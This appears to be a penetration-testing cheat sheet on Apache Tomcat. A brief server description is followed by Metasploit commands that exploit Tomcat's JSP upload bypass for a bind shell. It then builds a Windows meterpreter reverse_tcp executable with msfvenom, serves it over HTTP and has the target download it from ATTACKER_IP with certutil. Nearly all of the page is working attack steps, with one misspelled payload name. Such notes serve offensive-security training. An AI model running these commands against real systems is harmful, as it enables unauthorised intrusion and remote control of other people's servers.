Skip to content

Apache Tomcat Web Server

Apache Tomcat is a free and open source Java servlet web server.

It uses the HTTP protocol and runs on the TCP port 8080 by default.

The standard Apache HTTP web server is used to host web applications typically developed in PHP.

The Apache Tomcat web server is primarily used to host web applications developed in Java.

Exploiting Apache Tomcat Web Server with Metasploit

exploit/multi/http/tomcat_jsp_upload_bypass

service postgresql start

msfconsole

workspace -a tomcat

set RHOSTS TARGET_IP

db_nmap -sS -sV -O TARGET_IP

search type:exploit name:tomcat_jsp

use exploit/multi/http/tomcat_jsp_upload_bypass

info

# Set JSP shell
set payload java/jsp_shell_bind_tcp

# For Windows set shell to cmd
set SHELL cmd

run

Upgrade shell to meterpreter console

# Generate payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f exe > meterpreter.exe

# Transfer the payload onto the target system
# setup HTTP server
python3 -m http.server 80

# On the target system where we have a session
certutil -urlcache -f http://ATTACKER_IP:ATTACKER_PORT/meterpreter.exe meterpreter.exe

# Setup handler
msfconsole
use multi/handler
set PAYLOAD windows/meterperter/reverse_tcp
set LHOST ATTACKER_IP
set LPORT ATTACKER_PORT
run

# Execute payload
.\meterpreter.exe